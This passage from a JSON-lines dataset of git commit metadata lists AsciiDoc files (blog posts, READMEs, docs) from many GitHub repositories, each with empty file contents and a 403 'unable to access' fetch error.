2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fce1e0514dd40d92262aa916ec1f92f2d523b10b","subject":"Polish","message":"Polish\n","repos":"spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25e30e5ef4eab1e1ebc2011bba03a9e6e00f197b","subject":"doc to test API","message":"doc to test API\n","repos":"adoc-editor\/editor-backend","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"54fddba080466d146fe88ea69965e3ec98d12bbb","subject":"Added state and license badges","message":"Added state and license badges","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1279b9b0e707d6cfedf7a054adcfcf35e46b60a5","subject":"Create README.adoc","message":"Create README.adoc","repos":"skazi-pivotal\/StockInference-Spark,agallego-pivotal\/StockInference-Spark,skazi-pivotal\/StockInference-Spark,mattcaldwell\/StockInference-Spark,agallego-pivotal\/StockInference-Spark,Pivotal-Open-Source-Hub\/StockInference-Spark,mattcaldwell\/StockInference-Spark,skazi-pivotal\/StockInference-Spark,mattcaldwell\/StockInference-Spark,cerdmann-pivotal\/StockInference-Spark,agallego-pivotal\/StockInference-Spark,Pivotal-Open-Source-Hub\/StockInference-Spark,Pivotal-Open-Source-Hub\/StockInference-Spark,cerdmann-pivotal\/StockInference-Spark,cerdmann-pivotal\/StockInference-Spark","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Pivotal-Open-Source-Hub\/StockInference-Spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ee8ef50a4c700316b53f3a31f1dbd38c35cb66d2","subject":"Added first draft of a README.adoc","message":"Added first draft of a README.adoc\n\nChange-Id: I869c6d9608eea7339ecf127fb9637821938f2386\nSigned-off-by: Simon Scholz <86b72c53dacfdb9bb67c3d9e46af6b59fbfd212f@vogella.com>\n","repos":"vogellacompany\/swt-custom-widgets","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vogellacompany\/swt-custom-widgets.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"6234f87ac4f493c8e2a60f06de075435677dedb0","subject":"Remove coverityCheck","message":"Remove coverityCheck\n","repos":"hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hwolf\/oauth2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e1549c0018cd7f53cd5ce27b61267ea0defdf258","subject":"Add link to Python notes in README","message":"Add link to Python notes in README\n","repos":"cmpitg\/programming-language-notes","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"529b79540df2800339dd7c7cebc3541aaeca436f","subject":"y2b create post New iPad 5 Parts Leaked? (First Look + Comparison)","message":"y2b create post New iPad 5 Parts Leaked? (First Look + Comparison)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-03-New-iPad-5-Parts-Leaked-First-Look--Comparison.adoc","new_file":"_posts\/2013-09-03-New-iPad-5-Parts-Leaked-First-Look--Comparison.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acac6f44d5c2616faef14a0a3d9b3b6ddfd5f620","subject":"Update 2016-02-26-Demand-pricing-expected-at-Disney-World-and-Disneyland.adoc","message":"Update 2016-02-26-Demand-pricing-expected-at-Disney-World-and-Disneyland.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-26-Demand-pricing-expected-at-Disney-World-and-Disneyland.adoc","new_file":"_posts\/2016-02-26-Demand-pricing-expected-at-Disney-World-and-Disneyland.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d74f61df1a5ff0e74139f7ae7e9a8fb2416a0f6","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c93513f18f00081eac5c05475f4f5ef727e577aa","subject":"Fix typo in reference docs","message":"Fix typo in reference docs\n","repos":"vpavic\/spring-session,vpavic\/spring-session,vpavic\/spring-session","old_file":"spring-session-docs\/src\/docs\/asciidoc\/index.adoc","new_file":"spring-session-docs\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vpavic\/spring-session.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1c967017b0b2f528c595f89b5a07bf204a60b3b0","subject":"Update 2015-08-05-Recomendaciones-de-frameworks-python.adoc","message":"Update 2015-08-05-Recomendaciones-de-frameworks-python.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-08-05-Recomendaciones-de-frameworks-python.adoc","new_file":"_posts\/2015-08-05-Recomendaciones-de-frameworks-python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75378cf761aca3054032a630d64057288092d8d3","subject":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","message":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6436fea8e24cead1d0b921739da5f60651a3939","subject":"y2b create post Giant iPhone Zoom Lens - Does It Suck?","message":"y2b create post Giant iPhone Zoom Lens - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-16-Giant-iPhone-Zoom-Lens--Does-It-Suck.adoc","new_file":"_posts\/2016-05-16-Giant-iPhone-Zoom-Lens--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ff39d04096921241f25cd374668dd3d96490995","subject":"y2b create post Apple Watch Unboxing \\u0026 Setup","message":"y2b create post Apple Watch Unboxing \\u0026 Setup","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-04-25-Apple-Watch-Unboxing-u0026-Setup.adoc","new_file":"_posts\/2015-04-25-Apple-Watch-Unboxing-u0026-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdbfefff311d4f9bd9cf6fbffc74beb00c2dab3f","subject":"Update 2015-06-19-Event-driven-processing-pipeline.adoc","message":"Update 2015-06-19-Event-driven-processing-pipeline.adoc","repos":"der3k\/der3k.github.io,der3k\/der3k.github.io,der3k\/der3k.github.io","old_file":"_posts\/2015-06-19-Event-driven-processing-pipeline.adoc","new_file":"_posts\/2015-06-19-Event-driven-processing-pipeline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/der3k\/der3k.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35c17ce4117c24d10a107429adf5a054fc9a2a18","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"729472a2aa37ed737d0fa0cf442ec6416c7b824a","subject":"Update 2016-11-10-Title-issue.adoc","message":"Update 2016-11-10-Title-issue.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/2016-11-10-Title-issue.adoc","new_file":"_posts\/2016-11-10-Title-issue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2d61fd4d892ef896de19c38f53a47eb6b42437d","subject":"Added initial translation of \"pakkeforl\u00f8p\" documentation","message":"Added initial translation of \"pakkeforl\u00f8p\" documentation\n","repos":"bjornna\/dips-ckm,DIPSASA\/dips-ckm","old_file":"doc\/kreftpakkeforl\u00f8p\/kreftforlop_dokumentasjon_en.adoc","new_file":"doc\/kreftpakkeforl\u00f8p\/kreftforlop_dokumentasjon_en.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjornna\/dips-ckm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b93a8006f9fe8ea8aba83ad9c97e49c39dd7e65","subject":"Added TODO","message":"Added TODO","repos":"copiousfreetime\/stickler,copiousfreetime\/stickler","old_file":"TODO.asciidoc","new_file":"TODO.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/copiousfreetime\/stickler.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97636f44fd9e1e3614bec5d94157a2b81eb8c23b","subject":"Added readme to app controller","message":"Added readme to app controller\n","repos":"mrquincle\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh","old_file":"application_controller\/serial_interface\/README.adoc","new_file":"application_controller\/serial_interface\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrquincle\/nRF51-ble-bcast-mesh.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"c61bd3d2bd15e70ecb23593d2ce362f147b7df7f","subject":"add processserver secret doc","message":"add processserver secret doc\n","repos":"josefkarasek\/application-templates,bparees\/application-templates,knrc\/application-templates,errantepiphany\/application-templates,kyguy\/application-templates,douglaspalmer\/application-templates,bdecoste\/application-templates,jboss-openshift\/application-templates,rcernich\/application-templates","old_file":"docs\/secrets\/processserver-app-secret.adoc","new_file":"docs\/secrets\/processserver-app-secret.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jboss-openshift\/application-templates.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"968df133e19d63c4b1ef994b14ec4a04f133989a","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c7749d60e83e19a662af86cce40275dade6013f","subject":"y2b create post The Best Wireless Headphones You Can Buy Right Now","message":"y2b create post The Best Wireless Headphones You Can Buy Right Now","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-02-TheBestWirelessHeadphonesYouCanBuyRightNow.adoc","new_file":"_posts\/2018-02-02-TheBestWirelessHeadphonesYouCanBuyRightNow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e04cde7f89bc108ffe46d3d50a445caec80a51c5","subject":"Draft of preprocess post","message":"Draft of preprocess post\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-07-xx-js-preprocessing-improvements.adoc","new_file":"content\/news\/2017-07-xx-js-preprocessing-improvements.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c285583e6300c55d44590bd53db74890593ceed2","subject":"Update 2017-02-21.adoc","message":"Update 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21.adoc","new_file":"_posts\/2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a53adc33c6b0131206ac51490ac70d708c18220","subject":"Update 2015-10-20-Hash-in-Java.adoc","message":"Update 2015-10-20-Hash-in-Java.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-20-Hash-in-Java.adoc","new_file":"_posts\/2015-10-20-Hash-in-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9ceecf18cddfd913b147dd22adcb2fb6569600c","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4aac06926dccd040d1dd59feeeafbfc944dcaf28","subject":"Delete the file at '_posts\/2017-05-30-Java-Classes.adoc'","message":"Delete the file at '_posts\/2017-05-30-Java-Classes.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-30-Java-Classes.adoc","new_file":"_posts\/2017-05-30-Java-Classes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19098c57cbbfb02f42e3c6d7de5ff1dbc9fff5ee","subject":"Update 2016-03-17-J-V-M-Option.adoc","message":"Update 2016-03-17-J-V-M-Option.adoc","repos":"indusbox\/indusbox.github.io,indusbox\/indusbox.github.io,indusbox\/indusbox.github.io,indusbox\/indusbox.github.io","old_file":"_posts\/2016-03-17-J-V-M-Option.adoc","new_file":"_posts\/2016-03-17-J-V-M-Option.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/indusbox\/indusbox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5bb40c19fdf2bdac8fe41a8b6bb566b756a25a81","subject":"Update 2016-04-24-Post-2-Title.adoc","message":"Update 2016-04-24-Post-2-Title.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2016-04-24-Post-2-Title.adoc","new_file":"_posts\/2016-04-24-Post-2-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11b4da1b58c6332c4c02cf8b052c0a62f5982648","subject":"Update 2018-06-17-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-17-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-17-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-17-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"594eb5d21edb8092604ffeecbc394e54928713f2","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb81f70072d6d20323375818e7be9aa058f228d3","subject":"Update 2017-03-16-Installing-Tomcat-9-on-RHEL-6.adoc","message":"Update 2017-03-16-Installing-Tomcat-9-on-RHEL-6.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-16-Installing-Tomcat-9-on-RHEL-6.adoc","new_file":"_posts\/2017-03-16-Installing-Tomcat-9-on-RHEL-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f53371679f125c335d6a00658d49765d4c87f3de","subject":"nitrite explorer readme added","message":"nitrite explorer readme added\n","repos":"dizitart\/nitrite-database,dizitart\/nitrite-database,dizitart\/nitrite-database,dizitart\/nitrite-database,dizitart\/nitrite-database","old_file":"nitrite-explorer\/README.adoc","new_file":"nitrite-explorer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dizitart\/nitrite-database.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f1fcf779fbea14dbe986f780c74be4bdbd06762f","subject":"Update 2016-10-16-communicating-between-components-in-react-native.adoc","message":"Update 2016-10-16-communicating-between-components-in-react-native.adoc","repos":"pramodjg\/articles,pramodjg\/articles,pramodjg\/articles,pramodjg\/articles","old_file":"_posts\/2016-10-16-communicating-between-components-in-react-native.adoc","new_file":"_posts\/2016-10-16-communicating-between-components-in-react-native.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pramodjg\/articles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"caef7d4e396be1c9a3757657ff97ce77fd2c9734","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ceb1253f77f0c539bac4dfb7dff9f5e2c1350fed","subject":"Update 2016-02-19-Set-your-DVRs-Disneyland-60th-Anniversary-special-on-ABC.adoc","message":"Update 2016-02-19-Set-your-DVRs-Disneyland-60th-Anniversary-special-on-ABC.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-19-Set-your-DVRs-Disneyland-60th-Anniversary-special-on-ABC.adoc","new_file":"_posts\/2016-02-19-Set-your-DVRs-Disneyland-60th-Anniversary-special-on-ABC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07e9d8405f4b1b01fb04c5f9b46bc5334ec40d32","subject":"Update 2016-07-22-Stable-Matching-Algorithm.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"836c0a7563fa0333d46f5c3ea71c00f0bc4e1900","subject":"Update 2017-03-08-How-to-use-a-dedicated-Puppet-content-view-in-Satellite-6.adoc","message":"Update 2017-03-08-How-to-use-a-dedicated-Puppet-content-view-in-Satellite-6.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-03-08-How-to-use-a-dedicated-Puppet-content-view-in-Satellite-6.adoc","new_file":"_posts\/2017-03-08-How-to-use-a-dedicated-Puppet-content-view-in-Satellite-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"501be9a5cd16f8872e3875aab5c0561f07be40e7","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/joke_is_on_us.adoc","new_file":"content\/writings\/joke_is_on_us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5768254dc79eaf95cea32c723c546c88ab8e7872","subject":"y2b create post Motorola Xoom Unboxing \\u0026 Overview","message":"y2b create post Motorola Xoom Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-28-Motorola-Xoom-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-03-28-Motorola-Xoom-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f03273be79289e0f81e079fd65c4f9d36f344e1d","subject":"Update 2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","message":"Update 2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8977a0f90da75997efb43683d17b10a928c85d87","subject":"y2b create post Marvel Cinematic Universe: Phase One Unboxing \\u0026 Overview","message":"y2b create post Marvel Cinematic Universe: Phase One Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-03-Marvel-Cinematic-Universe-Phase-One-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-04-03-Marvel-Cinematic-Universe-Phase-One-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7fa5edf2cf8492d19e35f85ef3f6b3f8b067bb9","subject":"Update 2015-11-10-Pourquoi-je-suis-passe-a-Hub-Press.adoc","message":"Update 2015-11-10-Pourquoi-je-suis-passe-a-Hub-Press.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2015-11-10-Pourquoi-je-suis-passe-a-Hub-Press.adoc","new_file":"_posts\/2015-11-10-Pourquoi-je-suis-passe-a-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac79a0bad890a8e9d9a6f09ecb93b9a52feed01c","subject":"Update Scala: Use Option or Either to replace null as a failure indicator.asciidoc","message":"Update Scala: Use 